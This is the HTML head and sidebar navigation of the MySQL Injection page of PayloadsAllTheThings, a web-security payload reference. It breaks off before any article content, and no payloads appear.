PayloadsAllTheThings/SQL Injection/MySQL Injection/index.html

7562 lines
260 KiB
HTML
Raw Normal View History

<!doctype html>
<html lang="en" class="no-js">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width,initial-scale=1">
<meta name="description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security">
<link rel="canonical" href="https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/MySQL%20Injection/">
<link rel="prev" href="../MSSQL%20Injection/">
<link rel="next" href="../OracleSQL%20Injection/">
<link rel="icon" href="../../assets/images/favicon.png">
<meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.5.49">
<title>MySQL Injection - Payloads All The Things</title>
<link rel="stylesheet" href="../../assets/stylesheets/main.6f8fc17f.min.css">
<link rel="stylesheet" href="../../assets/stylesheets/palette.06af60db.min.css">
<style>
.social-container {
float: right;
}
</style>
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
<style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
<link rel="stylesheet" href="../../custom.css">
<script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
<meta property="og:type" content="website" >
<meta property="og:title" content="MySQL Injection - Payloads All The Things" >
<meta property="og:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta property="og:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/SQL Injection/MySQL Injection.png" >
<meta property="og:image:type" content="image/png" >
<meta property="og:image:width" content="1200" >
<meta property="og:image:height" content="630" >
<meta property="og:url" content="https://swisskyrepo.github.io/PayloadsAllTheThings/SQL%20Injection/MySQL%20Injection/" >
<meta name="twitter:card" content="summary_large_image" >
<meta name="twitter:title" content="MySQL Injection - Payloads All The Things" >
<meta name="twitter:description" content="Payloads All The Things, a list of useful payloads and bypasses for Web Application Security" >
<meta name="twitter:image" content="https://swisskyrepo.github.io/PayloadsAllTheThings/assets/images/social/SQL Injection/MySQL Injection.png" >
</head>
<body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo">
<input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
<input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
<label class="md-overlay" for="__drawer"></label>
<div data-md-component="skip">
<a href="#mysql-injection" class="md-skip">
Skip to content
</a>
</div>
<div data-md-component="announce">
</div>
<header class="md-header md-header--shadow" data-md-component="header">
<nav class="md-header__inner md-grid" aria-label="Header">
<a href="../.." title="Payloads All The Things" class="md-header__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
<label class="md-header__button md-icon" for="__drawer">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
</label>
<div class="md-header__title" data-md-component="header-title">
<div class="md-header__ellipsis">
<div class="md-header__topic">
<span class="md-ellipsis">
Payloads All The Things
</span>
</div>
<div class="md-header__topic" data-md-component="header-topic">
<span class="md-ellipsis">
MySQL Injection
</span>
</div>
</div>
</div>
<form class="md-header__option" data-md-component="palette">
<input class="md-option" data-md-color-media="(prefers-color-scheme: light)" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to dark mode" type="radio" name="__palette" id="__palette_0">
<label class="md-header__button md-icon" title="Switch to dark mode" for="__palette_1" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
<input class="md-option" data-md-color-media="(prefers-color-scheme: dark)" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="indigo" aria-label="Switch to light mode" type="radio" name="__palette" id="__palette_1">
<label class="md-header__button md-icon" title="Switch to light mode" for="__palette_0" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
</label>
</form>
<script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
<label class="md-header__button md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
</label>
<div class="md-search" data-md-component="search" role="dialog">
<label class="md-search__overlay" for="__search"></label>
<div class="md-search__inner" role="search">
<form class="md-search__form" name="search">
<input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
<label class="md-search__icon md-icon" for="__search">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
</label>
<nav class="md-search__options" aria-label="Search">
<a href="javascript:void(0)" class="md-search__icon md-icon" title="Share" aria-label="Share" data-clipboard data-clipboard-text="" data-md-component="search-share" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M18 16.08c-.76 0-1.44.3-1.96.77L8.91 12.7c.05-.23.09-.46.09-.7s-.04-.47-.09-.7l7.05-4.11c.54.5 1.25.81 2.04.81a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3c0 .24.04.47.09.7L8.04 9.81C7.5 9.31 6.79 9 6 9a3 3 0 0 0-3 3 3 3 0 0 0 3 3c.79 0 1.5-.31 2.04-.81l7.12 4.15c-.05.21-.08.43-.08.66 0 1.61 1.31 2.91 2.92 2.91s2.92-1.3 2.92-2.91A2.92 2.92 0 0 0 18 16.08"/></svg>
</a>
<button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
</button>
</nav>
<div class="md-search__suggest" data-md-component="search-suggest"></div>
</form>
<div class="md-search__output">
<div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
<div class="md-search-result" data-md-component="search-result">
<div class="md-search-result__meta">
Initializing search
</div>
<ol class="md-search-result__list" role="presentation"></ol>
</div>
</div>
</div>
</div>
</div>
<div class="md-header__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
</nav>
</header>
<div class="md-container" data-md-component="container">
<main class="md-main" data-md-component="main">
<div class="md-main__inner md-grid">
<div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--primary" aria-label="Navigation" data-md-level="0">
<label class="md-nav__title" for="__drawer">
<a href="../.." title="Payloads All The Things" class="md-nav__button md-logo" aria-label="Payloads All The Things" data-md-component="logo">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>
</a>
Payloads All The Things
</label>
<div class="md-nav__source">
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/" title="Go to repository" class="md-source" data-md-component="source">
<div class="md-source__icon md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 496 512"><!--! Font Awesome Free 6.7.1 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2024 Fonticons, Inc.--><path d="M165.9 397.4c0 2-2.3 3.6-5.2 3.6-3.3.3-5.6-1.3-5.6-3.6 0-2 2.3-3.6 5.2-3.6 3-.3 5.6 1.3 5.6 3.6m-31.1-4.5c-.7 2 1.3 4.3 4.3 4.9 2.6 1 5.6 0 6.2-2s-1.3-4.3-4.3-5.2c-2.6-.7-5.5.3-6.2 2.3m44.2-1.7c-2.9.7-4.9 2.6-4.6 4.9.3 2 2.9 3.3 5.9 2.6 2.9-.7 4.9-2.6 4.6-4.6-.3-1.9-3-3.2-5.9-2.9M244.8 8C106.1 8 0 113.3 0 252c0 110.9 69.8 205.8 169.5 239.2 12.8 2.3 17.3-5.6 17.3-12.1 0-6.2-.3-40.4-.3-61.4 0 0-70 15-84.7-29.8 0 0-11.4-29.1-27.8-36.6 0 0-22.9-15.7 1.6-15.4 0 0 24.9 2 38.6 25.8 21.9 38.6 58.6 27.5 72.9 20.9 2.3-16 8.8-27.1 16-33.7-55.9-6.2-112.3-14.3-112.3-110.5 0-27.5 7.6-41.3 23.6-58.9-2.6-6.5-11.1-33.3 2.6-67.9 20.9-6.5 69 27 69 27 20-5.6 41.5-8.5 62.8-8.5s42.8 2.9 62.8 8.5c0 0 48.1-33.6 69-27 13.7 34.7 5.2 61.4 2.6 67.9 16 17.7 25.8 31.5 25.8 58.9 0 96.5-58.9 104.2-114.8 110.5 9.2 7.9 17 22.9 17 46.4 0 33.7-.3 75.4-.3 83.6 0 6.5 4.6 14.4 17.3 12.1C428.2 457.8 496 362.9 496 252 496 113.3 383.5 8 244.8 8M97.2 352.9c-1.3 1-1 3.3.7 5.2 1.6 1.6 3.9 2.3 5.2 1 1.3-1 1-3.3-.7-5.2-1.6-1.6-3.9-2.3-5.2-1m-10.8-8.1c-.7 1.3.3 2.9 2.3 3.9 1.6 1 3.6.7 4.3-.7.7-1.3-.3-2.9-2.3-3.9-2-.6-3.6-.3-4.3.7m32.4 35.6c-1.6 1.3-1 4.3 1.3 6.2 2.3 2.3 5.2 2.6 6.5 1 1.3-1.3.7-4.3-1.3-6.2-2.2-2.3-5.2-2.6-6.5-1m-11.4-14.7c-1.6 1-1.6 3.6 0 5.9s4.3 3.3 5.6 2.3c1.6-1.3 1.6-3.9 0-6.2-1.4-2.3-4-3.3-5.6-2"/></svg>
</div>
<div class="md-source__repository">
GitHub
</div>
</a>
</div>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../.." class="md-nav__link">
<span class="md-ellipsis">
Payloads All The Things
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../CONTRIBUTING/" class="md-nav__link">
<span class="md-ellipsis">
CONTRIBUTING
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../DISCLAIMER/" class="md-nav__link">
<span class="md-ellipsis">
DISCLAIMER
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4" >
<label class="md-nav__link" for="__nav_4" id="__nav_4_label" tabindex="0">
<span class="md-ellipsis">
API Key Leaks
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4">
<span class="md-nav__icon md-icon"></span>
API Key Leaks
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../API%20Key%20Leaks/" class="md-nav__link">
<span class="md-ellipsis">
API Key and Token Leaks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../API%20Key%20Leaks/IIS-Machine-Keys/" class="md-nav__link">
<span class="md-ellipsis">
IIS Machine Keys
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Account Takeover
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Account Takeover
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Account%20Takeover/" class="md-nav__link">
<span class="md-ellipsis">
Account Takeover
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../Account%20Takeover/mfa-bypass/" class="md-nav__link">
<span class="md-ellipsis">
MFA Bypasses
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Business Logic Errors
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Business Logic Errors
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Business%20Logic%20Errors/" class="md-nav__link">
<span class="md-ellipsis">
Business Logic Errors
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" >
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
CORS Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CORS%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
CORS Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
CRLF Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
CRLF Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CRLF%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Carriage Return Line Feed
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
CSV Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
CSV Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CSV%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
CSV Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
CVE Exploits
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
CVE Exploits
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../CVE%20Exploits/" class="md-nav__link">
<span class="md-ellipsis">
Common Vulnerabilities and Exposures
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../CVE%20Exploits/Log4Shell/" class="md-nav__link">
<span class="md-ellipsis">
CVE-2021-44228 Log4Shell
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_11" >
<label class="md-nav__link" for="__nav_11" id="__nav_11_label" tabindex="0">
<span class="md-ellipsis">
Clickjacking
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_11_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_11">
<span class="md-nav__icon md-icon"></span>
Clickjacking
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Clickjacking/" class="md-nav__link">
<span class="md-ellipsis">
Clickjacking
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_12" >
<label class="md-nav__link" for="__nav_12" id="__nav_12_label" tabindex="0">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_12_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_12">
<span class="md-nav__icon md-icon"></span>
Client Side Path Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Client%20Side%20Path%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Client Side Path Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_13" >
<label class="md-nav__link" for="__nav_13" id="__nav_13_label" tabindex="0">
<span class="md-ellipsis">
Command Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_13_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_13">
<span class="md-nav__icon md-icon"></span>
Command Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Command%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Command Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_14" >
<label class="md-nav__link" for="__nav_14" id="__nav_14_label" tabindex="0">
<span class="md-ellipsis">
Cross Site Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_14_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_14">
<span class="md-nav__icon md-icon"></span>
Cross Site Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Cross-Site%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Cross-Site Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_15" >
<label class="md-nav__link" for="__nav_15" id="__nav_15_label" tabindex="0">
<span class="md-ellipsis">
DNS Rebinding
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_15_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_15">
<span class="md-nav__icon md-icon"></span>
DNS Rebinding
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../DNS%20Rebinding/" class="md-nav__link">
<span class="md-ellipsis">
DNS Rebinding
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_16" >
<label class="md-nav__link" for="__nav_16" id="__nav_16_label" tabindex="0">
<span class="md-ellipsis">
DOM Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_16_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_16">
<span class="md-nav__icon md-icon"></span>
DOM Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../DOM%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
DOM Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_17" >
<label class="md-nav__link" for="__nav_17" id="__nav_17_label" tabindex="0">
<span class="md-ellipsis">
Denial of Service
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_17_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_17">
<span class="md-nav__icon md-icon"></span>
Denial of Service
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Denial%20of%20Service/" class="md-nav__link">
<span class="md-ellipsis">
Denial of Service
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_18" >
<label class="md-nav__link" for="__nav_18" id="__nav_18_label" tabindex="0">
<span class="md-ellipsis">
Dependency Confusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_18_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_18">
<span class="md-nav__icon md-icon"></span>
Dependency Confusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Dependency%20Confusion/" class="md-nav__link">
<span class="md-ellipsis">
Dependency Confusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_19" >
<label class="md-nav__link" for="__nav_19" id="__nav_19_label" tabindex="0">
<span class="md-ellipsis">
Directory Traversal
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Directory Traversal
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Directory%20Traversal/" class="md-nav__link">
<span class="md-ellipsis">
Directory Traversal
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../File%20Inclusion/LFI-to-RCE/" class="md-nav__link">
<span class="md-ellipsis">
LFI to RCE
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../File%20Inclusion/Wrappers/" class="md-nav__link">
<span class="md-ellipsis">
Inclusion Using Wrappers
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
